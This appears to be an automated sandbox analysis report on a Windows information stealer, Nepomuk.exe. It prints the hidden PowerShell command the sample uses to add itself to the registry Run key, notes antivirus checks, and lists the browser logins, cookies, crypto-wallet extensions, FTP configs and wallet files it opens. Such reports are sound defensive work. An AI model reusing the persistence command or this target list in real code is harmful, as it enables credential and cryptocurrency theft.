                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\users\user\appdata\local\temp\t68wj1sm1u30wfln7xxtlwox8.exe\" }"
                    Source: C:\Users\user\Desktop\Nepomuk.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Nepomuk.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: Nepomuk.exe, Nepomuk.exe, 00000000.00000003.1466158005.0000000003F53000.00000004.00000800.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466158005.0000000003FEE000.00000004.00000800.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000000.1219887944.0000000000EF4000.00000002.00000001.01000000.00000003.sdmp, Nepomuk.exe, 00000000.00000003.1271551018.00000000035C6000.00000004.00000800.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472548905.000000000171E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466457237.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466378385.0000000003FEF000.00000004.00000800.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466407094.0000000001718000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466407094.000000000170C000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1471691846.0000000000EF4000.00000002.00000001.01000000.00000003.sdmp, Nepomuk.exe, 00000000.00000003.1466538836.000000000171C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: procmon.exe
                    Source: Nepomuk.exe, 00000000.00000003.1350478251.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350187617.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471485052.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472145956.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350308080.0000000001678000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471096945.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472383126.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1391895534.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466512578.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1359304340.00000000016E1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\Nepomuk.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    Source: Yara match File source: 0000000D.00000002.2472257494.000000000447C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000A.00000002.2472321608.00000000049AC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000D.00000002.2472257494.0000000004508000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: T68WJ1SM1U30WFLN7XXTLWOX8.exe PID: 5852, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: T68WJ1SM1U30WFLN7XXTLWOX8.exe PID: 4508, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: T68WJ1SM1U30WFLN7XXTLWOX8.exe PID: 1732, type: MEMORYSTR
                    Source: Yara match File source: 00000000.00000003.1356159060.0000000003F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000003.1359025401.0000000003F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000003.1466158005.0000000003F8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: Nepomuk.exe PID: 7724, type: MEMORYSTR
                    Source: Yara match File source: 0.2.Nepomuk.exe.1550000.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Nepomuk.exe.3550000.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Nepomuk.exe.1550000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000000.00000002.1471964767.0000000001550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: sslproxydump.pcap, type: PCAP
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflal
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdliaogehgdbhbnmkklieghmmjkpigpa
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\Desktop\Nepomuk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
